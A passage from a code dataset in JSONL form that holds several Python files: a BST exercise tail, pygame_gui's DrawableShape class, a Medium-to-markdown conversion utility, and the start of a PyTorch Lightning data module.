BST()\nbst.insert(BSTNode(8))\nbst.insert(BSTNode(5))\nbst.insert(BSTNode(4))\nbst.insert(BSTNode(9))\nbst.insert(BSTNode(18))\nbst.insert(BSTNode(19))\nbst.insert(BSTNode(72))\nbst.insert(BSTNode(1))\nbst.insert(BSTNode(56))\nbst.insert(BSTNode(62))\nbst.insert(BSTNode(61))\nprint(bst.search(BSTNode(6)))\nprint(bst.max())\nbst.showLevelOrder()\n","repo_name":"woodage/algortimes-and-datastructures-in-python","sub_path":"week 3/opdracht3.py","file_name":"opdracht3.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14683801545","text":"import math\n\nfrom collections import deque\nfrom typing import Dict, List, Union, Tuple, Optional\n\nimport pygame\n\nfrom pygame_gui.core.interfaces import IUIManagerInterface\nfrom pygame_gui.core.utility import basic_blit\n\nfrom pygame_gui.core.text import TextLineChunkFTFont, TextBoxLayout\nfrom pygame_gui.core.text.html_parser import HTMLParser\n\n\nclass DrawableShapeState:\n \"\"\"\n Represents a single state of a drawable shape.\n\n :param state_id: The ID/name of this state.\n\n \"\"\"\n def __init__(self, state_id: str):\n\n self.state_id = state_id\n self.surface = pygame.surface.Surface((0, 0), flags=pygame.SRCALPHA, depth=32)\n self.has_fresh_surface = False\n self.cached_background_id = None # type: Union[str, None]\n self.transition = None # type: Union[DrawableStateTransition, None]\n\n self.should_auto_pregen = self.state_id != 'disabled'\n self.generated = False\n\n # created if we have text\n self.text_surface: Optional[pygame.Surface] = None\n self.pre_text_surface: Optional[pygame.Surface] = None\n\n def get_surface(self) -> pygame.surface.Surface:\n \"\"\"\n Gets the pygame.surface.Surface of this state. Will be a blend of this state and\n the previous one if we are in a transition.\n\n :return: A pygame Surface for this state.\n\n \"\"\"\n if self.transition is not None:\n return self.transition.produce_blended_result()\n else:\n return self.surface\n\n def update(self, time_delta: float):\n \"\"\"\n Updates any transitions this state is in\n\n :param time_delta: The time passed between frames, measured in seconds.\n\n \"\"\"\n if self.transition is not None:\n self.transition.update(time_delta)\n self.has_fresh_surface = True\n if self.transition.finished:\n self.transition = None\n\n\nclass DrawableStateTransition:\n \"\"\"\n Starts & controls a transition between two states of a drawable shape.\n\n :param states: A dictionary of all the drawable states.\n :param start_state_id: The state to start from.\n :param target_state_id: The state to transition to.\n :param duration: The length of the transition\n :param progress: The initial progress along the transition.\n\n \"\"\"\n def __init__(self, states: Dict[str, DrawableShapeState],\n start_state_id: str, target_state_id: str,\n duration: float, *, progress: float = 0.0):\n\n self.states = states\n self.duration = duration\n self.remaining_time = self.duration - progress\n self.percentage_start_state = 1.0\n self.percentage_target_state = 0.0\n self.start_stat_id = start_state_id\n self.target_state_id = target_state_id\n self.finished = False\n\n def update(self, time_delta: float):\n \"\"\"\n Updates the timer for this transition.\n\n :param time_delta: The time passed between frames, measured in seconds.\n\n \"\"\"\n self.remaining_time -= time_delta\n if self.remaining_time > 0.0 and self.duration > 0.0:\n self.percentage_start_state = self.remaining_time / self.duration\n self.percentage_target_state = 1.0 - self.percentage_start_state\n else:\n self.finished = True\n\n def produce_blended_result(self) -> pygame.surface.Surface:\n \"\"\"\n Produces a blend between the images of our start state and our target state. The\n progression of the blend is dictated by the progress of time through the transition.\n\n :return: The blended surface.\n\n \"\"\"\n result = self.states[self.start_stat_id].surface.copy()\n blended_target = self.states[self.target_state_id].surface.copy()\n start_multiply_surface = pygame.surface.Surface(\n self.states[self.start_stat_id].surface.get_size(), flags=pygame.SRCALPHA, depth=32)\n target_multiply_surface = start_multiply_surface.copy()\n\n start_alpha = int(round(255.0*self.percentage_start_state))\n target_alpha = 255 - start_alpha\n\n start_multiply_surface.fill(pygame.Color(start_alpha, start_alpha, start_alpha, 255))\n target_multiply_surface.fill(pygame.Color(target_alpha, target_alpha, target_alpha, 255))\n\n result.blit(start_multiply_surface, (0, 0), special_flags=pygame.BLEND_RGB_MULT)\n blended_target.blit(target_multiply_surface, (0, 0), special_flags=pygame.BLEND_RGB_MULT)\n result.blit(blended_target, (0, 0), special_flags=pygame.BLEND_RGB_ADD)\n return result\n\n\nclass DrawableShape:\n \"\"\"\n Base class for a graphical 'shape' that we can use for many different UI elements. The intent\n is to make it easy to switch between UI elements having normal rectangles, circles or rounded\n rectangles as their visual shape while having the same non-shape related functionality.\n\n :param containing_rect: The rectangle which this shape is entirely contained within (including\n shadows, borders etc)\n :param theming_parameters: A dictionary of user supplied data that alters the appearance of\n the shape.\n :param states: Names for the different states the shape can be in, each may have different\n sets of colours & images.\n :param manager: The UI manager for this UI.\n\n \"\"\"\n def __init__(self,\n containing_rect: pygame.Rect,\n theming_parameters: Dict,\n states: List[str],\n manager: IUIManagerInterface):\n\n self.theming = theming_parameters\n self.containing_rect = containing_rect.copy()\n self.dynamic_width = True if self.containing_rect.width == -1 else False\n self.dynamic_height = True if self.containing_rect.height == -1 else False\n self.text_view_rect: Optional[pygame.Rect] = None\n\n self.shadow_width = 0\n self.border_width = 0\n self.shape_corner_radius = 0\n self.rounded_corner_offset = 0\n if 'shadow_width' in self.theming:\n self.shadow_width = self.theming['shadow_width']\n if 'border_width' in self.theming:\n self.border_width = self.theming['border_width']\n if 'shape_corner_radius' in self.theming:\n self.shape_corner_radius = self.theming['shape_corner_radius']\n self.rounded_corner_offset = int(self.shape_corner_radius -\n (math.sin(math.pi / 4) * self.shape_corner_radius))\n\n self.text_box_layout: Optional[TextBoxLayout] = None\n self.build_text_layout()\n\n self._evaluate_contents_for_containing_rect()\n self.containing_rect.width = max(self.containing_rect.width, 1)\n self.containing_rect.height = max(self.containing_rect.height, 1)\n\n self.initial_text_layout_size = (self.containing_rect.width,\n self.containing_rect.height)\n\n self.states = {}\n for state in states:\n self.states[state] = DrawableShapeState(state)\n\n if 'normal' in states:\n self.active_state = self.states['normal']\n else:\n raise NotImplementedError(\"No 'normal' state id supplied for drawable shape\")\n\n self.previous_state: Optional[DrawableShapeState] = None\n\n if 'transitions' in self.theming:\n self.state_transition_times = self.theming['transitions']\n else:\n self.state_transition_times = {}\n\n self.ui_manager = manager\n self.shape_cache = self.ui_manager.get_theme().shape_cache\n\n self.states_to_redraw_queue = deque([])\n self.need_to_clean_up = True\n\n self.should_trigger_full_rebuild = True\n self.time_until_full_rebuild_after_changing_size = 0.35\n self.full_rebuild_countdown = self.time_until_full_rebuild_after_changing_size\n\n self.click_area_shape = self.containing_rect.copy()\n self.border_rect = self.containing_rect.copy()\n self.background_rect = self.containing_rect.copy()\n self.base_surface: Optional[pygame.Surface] = None\n\n self.only_text_changed = False\n\n def _evaluate_contents_for_containing_rect(self):\n if self.dynamic_width:\n # check to see if we have text and a font, this won't work with HTML\n # text - throw a warning?\n # What we really need to to is process the html text layout by this\n # point but hold off finalising and passing default colours until later?\n if self.text_box_layout is not None:\n text_width = self.text_box_layout.layout_rect.width\n\n horiz_padding = 0\n if 'text_horiz_alignment_padding' in self.theming:\n horiz_padding = self.theming['text_horiz_alignment_padding']\n\n # As well as the text width we want to throw in the borders,\n # shadows and any text padding\n final_width = (text_width +\n (2 * self.shadow_width) +\n (2 * self.border_width) +\n (2 * self.rounded_corner_offset) +\n (2 * horiz_padding))\n\n self.text_view_rect.width = text_width\n self.text_box_layout.view_rect.width = self.text_view_rect.width\n self.containing_rect.width = final_width\n if self.dynamic_height:\n if self.text_box_layout is not None:\n text_height = self.text_box_layout.layout_rect.height\n\n vert_padding = 0\n if 'text_vert_alignment_padding' in self.theming:\n vert_padding = self.theming['text_vert_alignment_padding']\n\n # As well as the text height we want to throw in the borders,\n # shadows and any text padding\n final_height = (text_height +\n (2 * self.shadow_width) +\n (2 * self.border_width) +\n (2 * self.rounded_corner_offset) +\n (2 * vert_padding))\n self.text_view_rect.height = text_height\n self.text_box_layout.view_rect.height = self.text_view_rect.height\n self.containing_rect.height = final_height\n\n def set_active_state(self, state_id: str):\n \"\"\"\n Changes the currently active state for the drawable shape and, if setup in the theme,\n creates a transition blend from the previous state to the newly active one.\n\n :param state_id: the ID of the new state to make active.\n\n \"\"\"\n\n # make sure this state is generated before we set it.\n # should ensure that some more rarely used states are only generated if we use them\n if not self.states[state_id].generated:\n if state_id in self.states_to_redraw_queue:\n self.states_to_redraw_queue.remove(state_id)\n self.redraw_state(state_id)\n\n if state_id in self.states and self.active_state.state_id != state_id:\n self.previous_state = self.active_state\n self.active_state = self.states[state_id]\n self.active_state.has_fresh_surface = True\n\n if self.previous_state is not None and ((self.previous_state.state_id,\n self.active_state.state_id) in\n self.state_transition_times):\n prev_id = self.previous_state.state_id\n next_id = self.active_state.state_id\n duration = self.state_transition_times[(self.previous_state.state_id,\n self.active_state.state_id)]\n if self.previous_state.transition is None:\n # completely fresh transition\n self.active_state.transition = DrawableStateTransition(self.states,\n prev_id,\n next_id,\n duration)\n else:\n # check to see if we are reversing an in-progress transition.\n if self.previous_state.transition.start_stat_id == self.active_state.state_id:\n progress_time = self.previous_state.transition.remaining_time\n transition = DrawableStateTransition(self.states,\n prev_id,\n next_id,\n duration,\n progress=progress_time)\n self.active_state.transition = transition\n\n def update(self, time_delta: float):\n \"\"\"\n Updates the drawable shape to process rebuilds and update blends between states.\n\n :param time_delta: amount of time passed between now and the previous frame in seconds.\n\n \"\"\"\n if len(self.states_to_redraw_queue) > 0:\n state = self.states_to_redraw_queue.popleft()\n self.redraw_state(state)\n if self.need_to_clean_up and len(self.states_to_redraw_queue) == 0:\n # last state so clean up\n self.clean_up_temp_shapes()\n self.need_to_clean_up = False\n\n if self.full_rebuild_countdown > 0.0:\n self.full_rebuild_countdown -= time_delta\n\n if self.should_trigger_full_rebuild and self.full_rebuild_countdown <= 0.0:\n self.full_rebuild_on_size_change()\n\n self.active_state.update(time_delta)\n\n def full_rebuild_on_size_change(self):\n \"\"\"\n Triggered when we've changed the size of the shape and need to rebuild basically everything\n to account for it.\n\n \"\"\"\n shape_params_changed = False\n if 'shadow_width' in self.theming and self.shadow_width != self.theming['shadow_width']:\n self.shadow_width = self.theming['shadow_width']\n shape_params_changed = True\n if 'border_width' in self.theming and self.border_width != self.theming['border_width']:\n self.border_width = self.theming['border_width']\n shape_params_changed = True\n if ('shape_corner_radius' in self.theming and\n self.shape_corner_radius != self.theming['shape_corner_radius']):\n self.shape_corner_radius = self.theming['shape_corner_radius']\n self.rounded_corner_offset = int(self.shape_corner_radius -\n (math.sin(math.pi / 4) * self.shape_corner_radius))\n shape_params_changed = True\n\n if shape_params_changed or self.initial_text_layout_size != self.containing_rect.size:\n self.build_text_layout()\n self.should_trigger_full_rebuild = False\n self.full_rebuild_countdown = self.time_until_full_rebuild_after_changing_size\n\n def redraw_all_states(self, force_full_redraw: bool = False):\n \"\"\"\n Starts the redrawing process for all states of this shape that auto pre-generate.\n Redrawing is done one state at a time so will take a few loops of the game to\n complete if this shape has many states.\n \"\"\"\n self.states_to_redraw_queue = deque([state_id for state_id, state in self.states.items()\n if (state.should_auto_pregen or force_full_redraw)])\n initial_state = self.states_to_redraw_queue.popleft()\n self.redraw_state(initial_state)\n\n def align_all_text_rows(self):\n \"\"\"\n Aligns the text drawing position correctly according to our theming options.\n\n \"\"\"\n # Horizontal alignment\n if 'text_horiz_alignment' in self.theming:\n if (self.theming['text_horiz_alignment'] == 'center' or\n self.theming['text_horiz_alignment'] not in ['left', 'right']):\n method = 'rect'\n if 'text_horiz_alignment_method' in self.theming:\n method = self.theming['text_horiz_alignment_method']\n self.text_box_layout.horiz_center_all_rows(method)\n elif self.theming['text_horiz_alignment'] == 'left':\n self.text_box_layout.align_left_all_rows(0)\n else:\n self.text_box_layout.align_right_all_rows(0)\n else:\n self.text_box_layout.horiz_center_all_rows('rect')\n\n # Vertical alignment\n if 'text_vert_alignment' in self.theming:\n if (self.theming['text_vert_alignment'] == 'center' or\n self.theming['text_vert_alignment'] not in ['top', 'bottom']):\n self.text_box_layout.vert_center_all_rows()\n elif self.theming['text_vert_alignment'] == 'top':\n self.text_box_layout.vert_align_top_all_rows(0)\n else:\n self.text_box_layout.vert_align_bottom_all_rows(0)\n else:\n self.text_box_layout.vert_center_all_rows()\n\n def get_active_state_surface(self) -> pygame.surface.Surface:\n \"\"\"\n Get the main surface from the active state.\n\n :return: The surface asked for, or the best available substitute.\n\n \"\"\"\n if self.active_state is not None:\n return self.active_state.get_surface()\n else:\n return self.ui_manager.get_universal_empty_surface()\n\n def get_surface(self, state_name: str) -> pygame.surface.Surface:\n \"\"\"\n Get the main surface from a specific state.\n\n :param state_name: The state we are trying to get the surface from.\n\n :return: The surface asked for, or the best available substitute.\n\n \"\"\"\n if state_name in self.states and self.states[state_name].surface is not None:\n return self.states[state_name].surface\n elif state_name in self.states and self.states['normal'].surface is not None:\n return self.states['normal'].surface\n else:\n return pygame.surface.Surface((0, 0), flags=pygame.SRCALPHA, depth=32)\n\n def get_fresh_surface(self) -> pygame.surface.Surface:\n \"\"\"\n Gets the surface of the active state and resets the state's 'has_fresh_surface' variable.\n\n :return: The active state's main pygame.surface.Surface.\n\n \"\"\"\n self.active_state.has_fresh_surface = False\n return self.get_active_state_surface()\n\n def has_fresh_surface(self) -> bool:\n \"\"\"\n Lets UI elements find out when a state has finished building a fresh surface for times\n when we have to delay it for whatever reason.\n\n :return: True if there is a freshly built surface waiting, False if the shape has not\n changed.\n\n \"\"\"\n return self.active_state.has_fresh_surface\n\n def finalise_images_and_text(self,\n image_state_str: str,\n state_str: str,\n text_colour_state_str: str,\n text_shadow_colour_state_str: str,\n add_text: bool):\n \"\"\"\n Rebuilds any text or image used by a specific state in the drawable shape. Effectively\n this means adding them on top of whatever is already in the state's surface. As such it\n should generally be called last in the process of building up a finished drawable shape\n state.\n\n :param add_text:\n :param image_state_str: image ID of the state we are going to be adding images and text to.\n :param state_str: normal ID of the state we are going to be adding images and text to.\n :param text_colour_state_str: text ID of the state we are going to be adding images and\n text to.\n :param text_shadow_colour_state_str: text shadow ID of the state we are going to be adding\n images and text to.\n\n \"\"\"\n # Draw any themed images\n if image_state_str in self.theming and self.theming[image_state_str] is not None:\n image_rect = self.theming[image_state_str].get_rect()\n image_rect.center = (int(self.containing_rect.width / 2),\n int(self.containing_rect.height / 2))\n basic_blit(self.states[state_str].surface,\n self.theming[image_state_str], image_rect)\n if add_text:\n self.finalise_text(state_str, text_colour_state_str, text_shadow_colour_state_str)\n\n def build_text_layout(self):\n \"\"\"\n Build a text box layout for this drawable shape if it has some text.\n \"\"\"\n containing_rect_when_text_built = self.containing_rect.copy()\n # Draw any text\n if 'text' in self.theming and 'font' in self.theming and self.theming['text'] is not None:\n # we need two rectangles for the text. One is has actual area the\n # text surface takes up, which may be larger than the displayed area,\n # and its position on the final surface. The other is the amount of\n # area of the text surface which we blit from, which may be much smaller\n # than the total text area.\n\n horiz_padding = 0\n if 'text_horiz_alignment_padding' in self.theming:\n horiz_padding = self.theming['text_horiz_alignment_padding']\n\n vert_padding = 0\n if 'text_vert_alignment_padding' in self.theming:\n vert_padding = self.theming['text_vert_alignment_padding']\n\n total_text_buffer = self.shadow_width + self.border_width + self.rounded_corner_offset\n self.text_view_rect = self.containing_rect.copy()\n self.text_view_rect.x = 0\n self.text_view_rect.y = 0\n if self.dynamic_width:\n self.text_view_rect.width = -1\n else:\n self.text_view_rect.width = max(0, self.text_view_rect.width -\n ((total_text_buffer * 2) + (2 * horiz_padding)))\n\n if self.dynamic_height:\n self.text_view_rect.height = -1\n else:\n self.text_view_rect.height = max(0, self.text_view_rect.height -\n ((total_text_buffer * 2) + (2 * vert_padding)))\n\n text_actual_area_rect = self.text_view_rect.copy()\n text_actual_area_rect.x = total_text_buffer + horiz_padding\n text_actual_area_rect.y = total_text_buffer + vert_padding\n if 'text_width' in self.theming:\n text_actual_area_rect.width = self.theming['text_width']\n if 'text_height' in self.theming:\n text_actual_area_rect.height = self.theming['text_height']\n\n text_shadow_data = (0, 0, 0, pygame.Color('#10101070'), False)\n if 'text_shadow' in self.theming:\n text_shadow_data = self.theming['text_shadow']\n text_chunk = TextLineChunkFTFont(self.theming['text'],\n self.theming['font'],\n underlined=False,\n colour=pygame.Color('#FFFFFFFF'),\n using_default_text_colour=True,\n bg_colour=pygame.Color('#00000000'),\n text_shadow_data=text_shadow_data,\n max_dimensions=(text_actual_area_rect.width,\n text_actual_area_rect.height))\n text_chunk.should_centre_from_baseline = True\n default_font_data = {\"font\": self.theming['font'],\n \"font_colour\": (self.theming['normal_text']\n if 'normal_text' in self.theming else\n self.ui_manager.get_theme().get_colour('normal_text', None)),\n \"bg_colour\": pygame.Color('#00000000')}\n self.text_box_layout = TextBoxLayout(deque([text_chunk]), text_actual_area_rect,\n self.text_view_rect, line_spacing=1.25,\n default_font_data=default_font_data)\n if 'selected_bg' in self.theming:\n self.text_box_layout.selection_colour = self.theming['selected_bg']\n if 'text_cursor_colour' in self.theming:\n self.text_box_layout.set_cursor_colour(self.theming['text_cursor_colour'])\n self.align_all_text_rows()\n return containing_rect_when_text_built\n\n def finalise_text(self, state_str,\n text_colour_state_str: str = \"\",\n text_shadow_colour_state_str: str = \"\",\n only_text_changed: bool = False):\n \"\"\"\n Finalise the text to a surface with some last-minute data that doesn't require the text\n be re-laid out.\n\n :param only_text_changed:\n :param state_str: The name of the shape's state we are finalising.\n :param text_colour_state_str: The string identifying the text colour to use.\n :param text_shadow_colour_state_str: The string identifying the text shadow\n colour to use.\n \"\"\"\n if self.text_box_layout is not None:\n # copy the pre-text surface & create a new empty text surface for this state\n self.states[state_str].pre_text_surface = self.states[state_str].surface.copy()\n self.states[state_str].text_surface = pygame.surface.Surface(\n self.states[state_str].surface.get_size(), flags=pygame.SRCALPHA, depth=32)\n self.states[state_str].text_surface.fill('#00000000')\n\n if only_text_changed:\n\n self.text_box_layout.blit_finalised_text_to_surf(\n self.states[state_str].text_surface)\n basic_blit(self.states[state_str].surface, self.states[state_str].text_surface,\n (0, 0))\n else:\n self.text_box_layout.set_default_text_colour(self.theming[text_colour_state_str])\n self.text_box_layout.set_default_text_shadow_colour(\n self.theming[text_shadow_colour_state_str])\n self.text_box_layout.finalise_to_surf(self.states[state_str].text_surface)\n basic_blit(self.states[state_str].surface, self.states[state_str].text_surface,\n (0, 0))\n\n def apply_active_text_changes(self):\n \"\"\"\n Updates the shape surface with any changes to the text surface. Useful when we've made\n small edits to the text surface\n \"\"\"\n if self.text_box_layout is not None:\n for state_id, state in self.states.items():\n if state.pre_text_surface is not None and state.text_surface is not None:\n state.surface = state.pre_text_surface.copy()\n basic_blit(state.surface, state.text_surface, (0, 0))\n\n def set_text(self, text: str):\n \"\"\"\n Set the visible text that the drawable shape has on it. This call will build a text\n layout and then redraw the final shape with the new, laid out text on top.\n\n :param text: the new string of text to stick on the shape.\n \"\"\"\n self.theming['text'] = text\n self.build_text_layout()\n if 'disabled' in self.states and self.active_state == self.states['disabled']:\n self.redraw_all_states(force_full_redraw=True)\n else:\n self.redraw_all_states()\n\n def set_text_alpha(self, alpha: int):\n \"\"\"\n Set the alpha of just the text and redraw the shape with the new text on top.\n\n :param alpha: the alpha to set.\n \"\"\"\n self.text_box_layout.set_alpha(alpha)\n self.redraw_state(self.active_state.state_id, add_text=False)\n self.finalise_text(self.active_state.state_id, only_text_changed=True)\n\n def redraw_active_state_no_text(self):\n \"\"\"\n Redraw the currently active state with no text.\n \"\"\"\n self.redraw_state(self.active_state.state_id, add_text=False)\n\n def finalise_text_onto_active_state(self):\n \"\"\"\n Lets us draw the active state with no text and then paste the finalised surface from the\n text layout on top. Handy if we are doing some text effects in the text layout we don't want\n to lose by recreating the text from scratch.\n \"\"\"\n self.redraw_state(self.active_state.state_id, add_text=False)\n self.finalise_text(self.active_state.state_id, only_text_changed=True)\n\n def insert_text(self, text: str, layout_index: int, parser: Optional[HTMLParser] = None):\n \"\"\"\n Update the theming when we insert text, then pass down to the layout to do the actual\n inserting.\n :param text: the text to insert\n :param layout_index: where to insert it\n :param parser: an optional parser\n :return:\n \"\"\"\n self.theming['text'] = (self.theming['text'][:layout_index] +\n text +\n self.theming['text'][layout_index:])\n self.text_box_layout.insert_text(text, layout_index, parser)\n\n def toggle_text_cursor(self):\n \"\"\"\n Toggle the edit text cursor/carat between visible and invisible. Usually this is run to\n make the cursor appear to flash so it catches user attention.\n \"\"\"\n if self.text_box_layout is not None:\n self.text_box_layout.toggle_cursor()\n self.apply_active_text_changes()\n self.active_state.has_fresh_surface = True\n\n def redraw_state(self, state_str: str, add_text: bool = True):\n \"\"\"\n This method is declared for derived classes to implement but has no default\n implementation.\n\n :param add_text:\n :param state_str: The ID/name of the state to redraw.\n\n \"\"\"\n\n def clean_up_temp_shapes(self):\n \"\"\"\n This method is declared for derived classes to implement but has no default implementation.\n \"\"\"\n\n def collide_point(self, point: Union[pygame.math.Vector2,\n Tuple[int, int],\n Tuple[float, float]]):\n \"\"\"\n This method is declared for derived classes to implement but has no default implementation.\n\n :param point: A point to collide with this shape.\n\n \"\"\"\n\n def set_position(self, point: Union[pygame.math.Vector2,\n Tuple[int, int],\n Tuple[float, float]]):\n \"\"\"\n This method is declared for derived classes to implement but has no default implementation.\n\n :param point: A point to set this shapes position to.\n\n \"\"\"\n\n def set_dimensions(self, dimensions: Union[pygame.math.Vector2,\n Tuple[int, int],\n Tuple[float, float]]):\n \"\"\"\n This method is declared for derived classes to implement but has no default implementation.\n\n :param dimensions: The new dimensions for our shape.\n\n \"\"\"\n","repo_name":"MyreMylar/pygame_gui","sub_path":"pygame_gui/core/drawable_shapes/drawable_shape.py","file_name":"drawable_shape.py","file_ext":"py","file_size_in_byte":31764,"program_lang":"python","lang":"en","doc_type":"code","stars":510,"dataset":"github-code","pt":"35"} +{"seq_id":"18210870404","text":"import requests_html\nimport os\nimport requests\n\ndef get_medium_markdown(article_url):\n server = 'https://medium-to-markdown.now.sh/?url='\n url = server + article_url\n session = requests_html.HTMLSession()\n resp = session.get(url)\n resp.html.render(sleep=6)\n return resp.html.find('textarea')[0].full_text\n\ndef format_medium_markdown(markdown):\n title = get_title_from_markdown(markdown)\n markdown = '\\n'.join(markdown.splitlines()[8:])\n return get_header(title,'',[]) + markdown\n\ndef get_header(title, description,categories=[],toc='true'):\n title = title.replace(':', ' ')\n return f\"\"\"---\ntoc: {toc}\nlayout: post\ncomments: true\ndescription: {description}\ncategories: [Medium]\ntitle: {title}\n---\n\"\"\"\n\nmonth_num_dict = {\n 'Jan':'01',\n 'Feb':'02',\n 'Mar':'03',\n 'Apr':'04',\n 'May':'05',\n 'Jun':'06',\n 'Jul':'07',\n 'Aug':'08',\n 'Sep':'09',\n 'Oct':'10',\n 'Nov':'11',\n 'Dec':'12',\n}\n\ndef get_date_formatted(date):\n split = date[date.index(',')+2:].split(' ')[:3][::-1]\n split[1] = month_num_dict[split[1]]\n return '-'.join(split)\n\ndef get_title_from_markdown(markdown):\n for i in markdown.splitlines():\n if i.startswith('title: '): return i.replace('title: ', '')\n\ndef get_articles(profile):\n session = requests_html.HTMLSession()\n medium_link = f'https://medium.com/feed/@{profile}'.replace('@@','@')\n r = session.get(medium_link)\n for i in r.html.find('channel')[0].find('item'):\n link = i.find('link')[0].html.replace('', '')\n pub_date = i.find('pubDate')[0].text\n categories = i.find('category')\n yield link, get_date_formatted(pub_date), categories\n\n\ndef is_image(line): return line.startswith('![') and line.endswith(')') and 'medium.com' in line\n\ndef get_image_url(line):\n return line.split('](')[-1].replace(')','').strip()\n\ndef download_image(path, name, url):\n if not os.path.isdir(path): os.mkdir(path)\n try:\n img = requests.get(url,allow_redirects=True)\n with open(f'{path}/{name}.png','wb') as i_file:\n i_file.write(img.content)\n except:\n print('Unable to download key',name,url, 'png')\n\n\ndef download_images(path, name, markdown):\n #not compelete\n new_markdown = []\n path = path + '/' + name\n count = 1\n for line in markdown.splitlines():\n if is_image(line):\n print(line)\n download_image(path, str(count), get_image_url(line))\n url = '{{ site.baseurl }}/images/' + f'{name}/{count}.png'\n new_markdown.append(line.split(']')[0] + '](' + url+')')\n count+=1;\n else:\n new_markdown.append(line)\n return '\\n'.join(new_markdown)","repo_name":"abhinavsp0730/medium-to-fastpages","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25491524888","text":"import os\nimport numpy as np\nfrom typing import List, Union, Dict\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader, TensorDataset, Dataset, WeightedRandomSampler, RandomSampler\nimport torchvision\nimport pytorch_lightning as pl\nfrom sklearn import datasets as sk_dataset\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom loguru import logger\nimport math\n\nDATA_PATH=\"../data\"\n#os.makedirs(DATA_PATH, exist_ok=True)\n\nTORCH_SET = [\"mnist\", \"fashion_mnist\", \"cifar10\", \"cifar100\",]\nSKLEAN_SET = [\"wine\", \"boston\", \"iris\", \"diabete\", \"digits\", \"linnerud\"]\nOTHER_SET = [\"arithmetic\", \"multi_scale_feature\", \"scm\"]\nDATA_SET = TORCH_SET + SKLEAN_SET + OTHER_SET\n\nfrom .utils import str2dic, bool_flag\nfrom .datasets.multi_scale_feature import get_dataloader as get_dataloader_msf\nfrom .datasets.scm import get_dataloader as get_dataloader_scm\n\ndef sigmoidal(x) : return torch.erf(x / np.sqrt(2))\ndef id(x) : return x\ng_dic = {\n \"id\" : id,\n 'relu' : F.relu,\n 'tanh' : F.tanh,\n \"sigmoid\" : sigmoidal,\n}\n\nclass DatasetWithIndexes(Dataset):\n def __init__(self, dataset):\n self.dataset = dataset\n \n def __getitem__(self, index):\n data, target = self.dataset[index]\n return data, target, index\n\n def __len__(self):\n return len(self.dataset)\n\ndef get_dataloader(x, y, train_pct, include_indexes = False, train_batch_size = None, val_batch_size = None, num_workers=0, return_just_set = True):\n \"\"\"We define a data constructor that we can use for various purposes later.\"\"\"\n \n dataset = TensorDataset(x, y)\n if include_indexes :\n dataset = DatasetWithIndexes(dataset)\n n = len(dataset)\n train_size = train_pct * n // 100\n val_size = n - train_size\n print(f\"train_size, val_size : {train_size}, {val_size}\")\n\n train_set, val_set = torch.utils.data.random_split(dataset, [train_size, val_size])\n\n if return_just_set :\n return train_set, val_set\n\n assert train_batch_size is not None\n assert val_batch_size is not None\n train_loader = DataLoader(train_set, batch_size=min(train_batch_size, train_size), shuffle=True, drop_last=False, pin_memory=True, num_workers=num_workers)\n val_loader = DataLoader(val_set, batch_size=min(val_batch_size, val_size), shuffle=False, drop_last=False, num_workers=num_workers)\n dataloader = DataLoader(dataset, batch_size=min(train_batch_size, n), shuffle=False, drop_last=False, num_workers=num_workers)\n\n data_infos = {\n \"train_batch_size\" : min(train_batch_size, train_size), \"val_batch_size\" : min(val_batch_size, val_size), \n \"train_size\":train_size, \"val_size\":val_size, \n \"train_n_batchs\":len(train_loader), \"val_n_batchs\":len(val_loader)\n }\n\n return train_loader, val_loader, dataloader, data_infos\n\ndef cut_dataset(dataset, pct):\n n = len(dataset)\n size = pct * n // 100\n print(f\"size, n-size : {size}, {n-size}\")\n remaining, _ = torch.utils.data.random_split(dataset, [size, n - size])\n return remaining\n\ndef get_arithmetic_set(p, regression, operator=\"+\", ij_equal_ji = True, modular = True):\n \"\"\"We define a data constructor that we can use for various purposes later.\"\"\"\n assert operator in [\"+\", \"*\"]\n if ij_equal_ji :\n x = []\n for i in range(p) :\n for j in range(i, p) :\n x.append([i, j])\n x = torch.LongTensor(x) # (p*(p+1)/2, 2)\n else :\n ij = torch.arange(p) # (p,)\n x = torch.cartesian_prod(ij, ij) # (p^2, 2)\n y = x.sum(1) if operator==\"+\" else x.prod(1) # (p*(p+1)/2,) if ij_equal_ji, else # (p^2,)\n if modular : y = torch.remainder(y, p)\n if regression : y = y.float() \n return x, y\n\nclass LMLightningDataModule(pl.LightningDataModule):\n def __init__(\n self,\n dataset_name : str,\n train_batch_size: int,\n val_batch_size: int,\n train_pct: int = 100,\n val_pct: int = 100,\n use_sampler : bool = False, \n data_path: str = DATA_PATH,\n num_workers: int = 0, \n ):\n super(LMLightningDataModule, self).__init__()\n assert dataset_name in DATA_SET \\\n or \"arithmetic\" in dataset_name \\\n or 'scm' in dataset_name\n if dataset_name in SKLEAN_SET \\\n or \"arithmetic\" in dataset_name :\n assert 0 < train_pct < 100\n self.dataset_name = dataset_name\n self.train_batch_size = train_batch_size\n self.val_batch_size = val_batch_size\n self.train_pct = train_pct\n self.val_pct = val_pct\n self.data_path = data_path\n self.num_workers = num_workers\n\n self.use_sampler = use_sampler\n self.sampler = None\n\n self.prepare_data()\n \n def prepare_data(self):\n logger.info(f\"Dataset {self.dataset_name} loading....\")\n os.makedirs(self.data_path, exist_ok=True)\n h_in, w_in = 0, 0\n tmp = {}\n if self.dataset_name == \"mnist\" :\n # https://discuss.pytorch.org/t/normalization-in-the-mnist-example/457?u=pascal_notsawo\n # https://discuss.pytorch.org/t/normalization-in-the-mnist-example/457/31?u=pascal_notsawo\n \"\"\"\n data = train_dataset.data.float()\n mean = np.round(data.mean(axis=(0,1,2))/255,4)\n std = np.round(data.std(axis=(0,1,2))/255,4)\n \"\"\"\n mean, std = 0.1307000070810318, 0.30809998512268066\n transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((mean,), (std,))])\n self.train_dataset = torchvision.datasets.MNIST(self.data_path, train=True, download=True, transform = transform)\n self.val_dataset = torchvision.datasets.MNIST(self.data_path, train=False, download=True, transform = transform)\n c_in, h_in, w_in, n_class = 1, 28, 28, 10\n task = \"classification\"\n classes = tuple(range(10))\n elif self.dataset_name == \"fashion_mnist\" :\n mean, std = 0.28600001335144043, 0.3529999852180481\n transform = 